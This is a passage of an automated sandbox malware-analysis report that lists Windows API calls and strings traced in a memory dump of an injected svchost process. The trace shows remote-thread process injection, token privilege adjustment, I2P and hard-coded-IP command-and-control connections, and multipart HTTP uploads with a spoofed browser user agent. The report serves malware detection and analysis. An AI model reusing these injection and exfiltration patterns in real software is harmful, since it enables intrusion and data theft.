    • lstrcmpiA.KERNEL32(?,.b32.i2p:443), ref: 00EF348D
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00000000,00000000,00000000,00F032D0,0294FF38,00EFC3DC,02908008,m_i2p32,0294FF1C), ref: 00EF389B
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00F03560), ref: 00EF38A2
      • Part of subcall function 00EF388A: wsprintfA.USER32(00000000,%s/%s/0,00000000,00F03560), ref: 00EF38C1
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • socket.WS2_32(00000002,00000001,00000006), ref: 00EF19CB
    • WSAConnect.WS2_32(000000FF,?,00000010,00000000,00000000,00000000,00000000), ref: 00EF1A1A
    • closesocket.WS2_32(000000FF), ref: 00EF1A28
    • getsockname.WS2_32(000000FF,?,?), ref: 00EF1A62
    • socket.WS2_32(00000002,00000001,00000006), ref: 00EF1A8C
      • Part of subcall function 00EF5959: MultiByteToWideChar.KERNEL32(00000000,00000000,00EF1AEE,000000FF,?,00000100), ref: 00EF5978
    • WSAConnect.WS2_32(000000FF,?,00000010,00000000,00000000,00000000,00000000), ref: 00EF1B15
    • getsockname.WS2_32(000000FF,?,?), ref: 00EF1B4B
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EFD6A8: CreateFileMappingW.KERNEL32(000000FF,00000000,00000040,00000000,000DA910,00000000), ref: 00EFD6B8
      • Part of subcall function 00EFD6A8: MapViewOfFile.KERNEL32(00000000,0000000E,00000000,00000000,00000000), ref: 00EFD6CA
      • Part of subcall function 00EFD6A8: UnmapViewOfFile.KERNEL32(00000000), ref: 00EFD6F5
      • Part of subcall function 00EFD6A8: CloseHandle.KERNEL32(0000960D), ref: 00EFD6FD
      • Part of subcall function 00EF5165: QueryPerformanceCounter.KERNEL32(00000000), ref: 00EF516E
    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EFD7F5
    • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0294FEE8,0294FEE8), ref: 00EFD817
    • Sleep.KERNEL32(00000010), ref: 00EFD827
      • Part of subcall function 00EFD72D: lstrcmpA.KERNEL32(00000000,GetProcAddress,00000000,00000000,00EFD84D), ref: 00EFD741
    • FlushInstructionCache.KERNEL32(00000000,00000000,00EFB303), ref: 00EFD856
    • WaitForSingleObject.KERNEL32(0000960D,00001964), ref: 00EFD86B
    • TerminateThread.KERNEL32(0000960D,00000000), ref: 00EFD87A
      • Part of subcall function 00EFD70A: UnmapViewOfFile.KERNEL32(00000000), ref: 00EFD710
      • Part of subcall function 00EFD70A: NtUnmapViewOfSection.NTDLL(00000000,00000000), ref: 00EFD71C
      • Part of subcall function 00EFD70A: CloseHandle.KERNEL32(00000000), ref: 00EFD725
    • CloseHandle.KERNEL32(0000960D), ref: 00EFD89B
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • GetTickCount.KERNEL32 ref: 00EFC410
    • Sleep.KERNEL32(00000BB8), ref: 00EFC42E
    • GetTickCount.KERNEL32 ref: 00EFC46F
      • Part of subcall function 00EF1816: lstrcpyA.KERNEL32(?,?,00000000,?,7C80934A), ref: 00EF17A2
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00000000,00000000,00000000,00F032D0,0294FF38,00EFC3DC,02908008,m_i2p32,0294FF1C), ref: 00EF389B
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00F03560), ref: 00EF38A2
      • Part of subcall function 00EF388A: wsprintfA.USER32(00000000,%s/%s/0,00000000,00F03560), ref: 00EF38C1
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • lstrlenA.KERNEL32(?,?,?,?,?,00EF17DA,?,?,?,?,?,?,?,000026AC), ref: 00EF15AE
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00EFE2C0), ref: 00EF15DA
    • CreateThread.KERNEL32(00000000,00000000,00EF11C5,00000000), ref: 00EF1638
    • CloseHandle.KERNEL32(?), ref: 00EF1645
    • CloseHandle.KERNEL32(00000000), ref: 00EF1650
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EFBE53: GetTickCount.KERNEL32 ref: 00EFBE61
      • Part of subcall function 00EFBE53: GetTickCount.KERNEL32 ref: 00EFBF04
    • GetTickCount.KERNEL32 ref: 00EFCE3C
      • Part of subcall function 00EF528E: GetCurrentProcess.KERNEL32 ref: 00EF5294
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000200,00000000,00000000), ref: 00EFCE75
      • Part of subcall function 00EFC287: CreateThread.KERNEL32(00000000,00000000,Function_0000C25F), ref: 00EFC2AC
      • Part of subcall function 00EFC287: CloseHandle.KERNEL32(00000000), ref: 00EFC2B9
      • Part of subcall function 00EFBF16: GetTickCount.KERNEL32 ref: 00EFBF35
      • Part of subcall function 00EFBF16: GetTickCount.KERNEL32 ref: 00EFBF85
      • Part of subcall function 00EFC2CA: GetVersionExW.KERNEL32(0294FE00), ref: 00EFC2E9
      • Part of subcall function 00EFC2CA: wsprintfA.USER32(0294FF1C,00EFE4E4,?), ref: 00EFC3BF
      • Part of subcall function 00EF4E22: lstrlenA.KERNEL32(?,?), ref: 00EF4E3B
      • Part of subcall function 00EF4E22: lstrlenA.KERNEL32(?), ref: 00EF4E42
      • Part of subcall function 00EF4E22: wsprintfA.USER32(00000000,%s/%s/0,?,?), ref: 00EF4E61
      • Part of subcall function 00EFBDCF: CreateThread.KERNEL32(00000000,00000000,?,?), ref: 00EFBDE7
      • Part of subcall function 00EFBDCF: CloseHandle.KERNEL32(00000000), ref: 00EFBDF2
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetCurrentProcess.KERNEL32 ref: 00EF5317
    • OpenProcessToken.ADVAPI32(00000000), ref: 00EF531E
    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00EF5339
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 00EF5356
    • CloseHandle.KERNEL32(?), ref: 00EF5361
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00EF62CE
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EF62EE
    • GetLastError.KERNEL32(?,?), ref: 00EF62FB
    • InternetCloseHandle.WININET(?), ref: 00EF6306
    • SetLastError.KERNEL32(00000000,?,?), ref: 00EF630D
    Strings
    • Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36, xrefs: 00EF62C9
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EFB94B: CloseHandle.KERNEL32(00000000), ref: 00EFB982
    • wsprintfA.USER32(?,00EFE4E4,?,?,?,?,?,?,00EFCC08,00000002,?,00EFCDA4), ref: 00EFCBD1
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00000000,00000000,00000000,00F032D0,0294FF38,00EFC3DC,02908008,m_i2p32,0294FF1C), ref: 00EF389B
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00F03560), ref: 00EF38A2
      • Part of subcall function 00EF388A: wsprintfA.USER32(00000000,%s/%s/0,00000000,00F03560), ref: 00EF38C1
      • Part of subcall function 00EFB8C5: GetExitCodeProcess.KERNEL32(?,00000000), ref: 00EFB8D9
      • Part of subcall function 00EFB8C5: CloseHandle.KERNEL32(?), ref: 00EFB8EF
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • GetLastError.KERNEL32 ref: 00EF6AC7
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00EF6B0C
    • ReadFile.KERNEL32(?,?,00800000,?,00000000), ref: 00EF6B29
    • FlushFileBuffers.KERNEL32(?), ref: 00EF6B47
    • DisconnectNamedPipe.KERNEL32(?), ref: 00EF6B4F
    • CloseHandle.KERNEL32(?), ref: 00EF6B57
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • lstrlenA.KERNEL32(00000540,00000000,?,00000000,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000), ref: 00EF4ECA
    • lstrlenA.KERNEL32(00000644,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000,?,0294FF3C,00EF3A46,00EFB3CF), ref: 00EF4ECF
    • lstrlenA.KERNEL32(00000440,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000,?,0294FF3C,00EF3A46,00EFB3CF), ref: 00EF4EDA
    • lstrlenA.KERNEL32(00000000,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000,?,0294FF3C,00EF3A46,00EFB3CF), ref: 00EF4EE1
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • wsprintfA.USER32(00000000,/%s/%s/%d/%s/%s/,00000540,00000440,00000001,00000000,00000644,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10), ref: 00EF4F19
      • Part of subcall function 00EF60D5: CloseHandle.KERNEL32(?), ref: 00EF6124
      • Part of subcall function 00EF60D5: CloseHandle.KERNEL32(?), ref: 00EF612C
      • Part of subcall function 00EF60D5: CloseHandle.KERNEL32(?), ref: 00EF6134
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EF5E1B
    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EF5E32
    • CloseHandle.KERNEL32(00000000), ref: 00EF5E3F
    • lstrlenA.KERNEL32(00000000,00000080,00000002), ref: 00EF5E71
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • CloseHandle.KERNEL32(?), ref: 00EF5EA3
    • CloseHandle.KERNEL32(?), ref: 00EF5EAB
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • lstrcmpA.KERNEL32(?,-00000540,?,00000000), ref: 00EF4B04
    • lstrcmpA.KERNEL32(?,-00000440), ref: 00EF4B41
    • lstrcmpA.KERNEL32(00000000,00000000), ref: 00EF4B75
    • StrToIntA.SHLWAPI(00000000), ref: 00EF4BAA
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EF546B
    • GetProcAddress.KERNEL32(00000000), ref: 00EF5472
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EF5484
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • lstrlenA.KERNEL32(00000540,00000000,02908008,00000000,?,0294FEF4,00EF3E47,0294FF14,00000003,00000000,00000002,00000002,00000000,00F032D0,?,0294FF1C), ref: 00EF40DC
    • lstrlenA.KERNEL32(00000644,?,0294FEF4,00EF3E47,0294FF14,00000003,00000000,00000002,00000002,00000000,00F032D0,?,0294FF1C,00EFC957,00000003,0294FF18), ref: 00EF40E8
    • lstrlenA.KERNEL32(00000440,?,0294FEF4,00EF3E47,0294FF14,00000003,00000000,00000002,00000002,00000000,00F032D0,?,0294FF1C,00EFC957,00000003,0294FF18), ref: 00EF40F6
    • wsprintfA.USER32(00000000,/%s/%s/5/%s/%s/,00000540,00000440,00000003,00000644,?,0294FEF4,00EF3E47,0294FF14,00000003,00000000,00000002,00000002,00000000,00F032D0), ref: 00EF412E
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • inet_addr.WS2_32(FD9BF563), ref: 00EFAA93
    • socket.WS2_32(00000002,00000001,00000000), ref: 00EFAAAA
    • htons.WS2_32(000001BB), ref: 00EFAAD1
    • connect.WS2_32(00000000,0294FE9C,00000010), ref: 00EFAAE2
    • closesocket.WS2_32(00000000), ref: 00EFAAEB
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • wsprintfA.USER32(?,--%sContent-Disposition: form-data; name="%s",FFFECD63,00000000,00000000,?,0294FEC8,00EF6071,?,000000A4,00000000,00000000,?,?,0294FEC4,00EF50F2), ref: 00EF5F73
    • lstrlenA.KERNEL32(?,00000000,,00000000,00000000,Content-Type: ), ref: 00EF5FA9
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetWindowLongW.USER32(?,000000F0), ref: 00EFBB2B
    • GetWindowInfo.USER32(?,?), ref: 00EFBB3D
    • GetParent.USER32(?), ref: 00EFBB4F
    • SetActiveWindow.USER32(00000000), ref: 00EFBB56
    • PostMessageW.USER32(?,000000F5,00000000,00000000), ref: 00EFBB66
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetVersionExW.KERNEL32(0294FE00), ref: 00EFC2E9
    • wsprintfA.USER32(0294FF1C,00EFE4E4,?), ref: 00EFC3BF
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00000000,00000000,00000000,00F032D0,0294FF38,00EFC3DC,02908008,m_i2p32,0294FF1C), ref: 00EF389B
      • Part of subcall function 00EF388A: lstrlenA.KERNEL32(00F03560), ref: 00EF38A2
      • Part of subcall function 00EF388A: wsprintfA.USER32(00000000,%s/%s/0,00000000,00F03560), ref: 00EF38C1
      • Part of subcall function 00EFB8C5: GetExitCodeProcess.KERNEL32(?,00000000), ref: 00EFB8D9
      • Part of subcall function 00EFB8C5: CloseHandle.KERNEL32(?), ref: 00EFB8EF
      • Part of subcall function 00EFBC05: CreateThread.KERNEL32(00000000,00000000,00EFBB78,00000000), ref: 00EFBC1C
      • Part of subcall function 00EFBC05: CloseHandle.KERNEL32(00000000), ref: 00EFBC23
      • Part of subcall function 00EFB94B: CloseHandle.KERNEL32(00000000), ref: 00EFB982
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • lstrlenA.KERNEL32(00000000), ref: 00EF3B37
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EF3B64
    • ReleaseMutex.KERNEL32 ref: 00EF3B8A
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • HttpSendRequestExW.WININET(?,?,00000000,00000000,00000000), ref: 00EF622C
    • InternetWriteFile.WININET(?,?,00000400,00000000), ref: 00EF6267
    • HttpEndRequestW.WININET(?,00000000,00000000,00000000), ref: 00EF6283
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • EnterCriticalSection.KERNEL32(?,?,00EF23AA,?,?,?), ref: 00EF24BC
    • SetEvent.KERNEL32(?), ref: 00EF250E
    • LeaveCriticalSection.KERNEL32(?), ref: 00EF258A
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    Strings
    • SERSPROFILE=C:\Documents and Settings\All Users, xrefs: 00EF2554
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • StrStrA.SHLWAPI(?,/), ref: 00EF4BF1
    • StrToIntA.SHLWAPI(00000000), ref: 00EF4C1D
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • InitializeCriticalSection.KERNEL32 ref: 00EF241D
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00EF2428
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • lstrcmpA.KERNEL32(?,?,00000000,?,00000000), ref: 00EF43FA
    • lstrcmpA.KERNEL32(?,?), ref: 00EF4433
    • lstrcmpA.KERNEL32(?,?), ref: 00EF447A
    • lstrlenA.KERNEL32(?), ref: 00EF44AE
    • lstrcpyA.KERNEL32(?,00000000), ref: 00EF44C0
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • wsprintfA.USER32(0294FBC0,/%s/%s/%d/%s/%s/,00000540,00000440,00000002,00000000,00000644,00000000), ref: 00EF5083
    • wsprintfA.USER32(0294FBC0,/%s/%s/%d/%s/,00000540,00000440,00000002,00000644,00000000), ref: 00EF50A5
      • Part of subcall function 00EF60D5: CloseHandle.KERNEL32(?), ref: 00EF6124
      • Part of subcall function 00EF60D5: CloseHandle.KERNEL32(?), ref: 00EF612C
      • Part of subcall function 00EF60D5: CloseHandle.KERNEL32(?), ref: 00EF6134
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EF519F: LookupAccountSidW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00EF51C7
      • Part of subcall function 00EF519F: GetLastError.KERNEL32 ref: 00EF51D2
      • Part of subcall function 00EF519F: LookupAccountSidW.ADVAPI32(00000000,00000200,?,00000200,00000000,?,?), ref: 00EF5200
    • OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00EF5223
    • GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,?), ref: 00EF5242
    • GetLastError.KERNEL32 ref: 00EF5244
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • GetTokenInformation.ADVAPI32(?,00000001,00000000,?,?), ref: 00EF526C
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • lstrlenA.KERNEL32(?,?), ref: 00EF4E3B
    • lstrlenA.KERNEL32(?), ref: 00EF4E42
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • wsprintfA.USER32(00000000,%s/%s/0,?,?), ref: 00EF4E61
      • Part of subcall function 00EF4EA6: lstrlenA.KERNEL32(00000540,00000000,?,00000000,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000), ref: 00EF4ECA
      • Part of subcall function 00EF4EA6: lstrlenA.KERNEL32(00000644,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000,?,0294FF3C,00EF3A46,00EFB3CF), ref: 00EF4ECF
      • Part of subcall function 00EF4EA6: lstrlenA.KERNEL32(00000440,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000,?,0294FF3C,00EF3A46,00EFB3CF), ref: 00EF4EDA
      • Part of subcall function 00EF4EA6: lstrlenA.KERNEL32(00000000,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10,00EF31D9,00EF0000,?,0294FF3C,00EF3A46,00EFB3CF), ref: 00EF4EE1
      • Part of subcall function 00EF4EA6: wsprintfA.USER32(00000000,/%s/%s/%d/%s/%s/,00000540,00000440,00000001,00000000,00000644,?,?,0294FF00,00EF311E,?,?,?,?,0294FF10), ref: 00EF4F19
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000040,00000000,000DA910,00000000), ref: 00EFD6B8
    • MapViewOfFile.KERNEL32(00000000,0000000E,00000000,00000000,00000000), ref: 00EFD6CA
    • CloseHandle.KERNEL32(0000960D), ref: 00EFD6FD
      • Part of subcall function 00EFD5F3: NtMapViewOfSection.NTDLL(00EFB303,0294FF2C,0294FEDC,00000000), ref: 00EFD620
    • UnmapViewOfFile.KERNEL32(00000000), ref: 00EFD6F5
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • wsprintfA.USER32(?,00EFE4E4,?,00001000,Content-Length: ,00000000,00000000,?), ref: 00EF61CE
    Strings
    • Accept: text/htmlConnection: Keep-Alive, xrefs: 00EF61E1
    • Content-Length: , xrefs: 00EF61B7
    • Content-Type: multipart/form-data; boundary=, xrefs: 00EF6198
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • lstrlenA.KERNEL32(00000000,00000000,00000000,00F032D0,0294FF38,00EFC3DC,02908008,m_i2p32,0294FF1C), ref: 00EF389B
    • lstrlenA.KERNEL32(00F03560), ref: 00EF38A2
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • wsprintfA.USER32(00000000,%s/%s/0,00000000,00F03560), ref: 00EF38C1
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    Strings
    Memory Dump Source
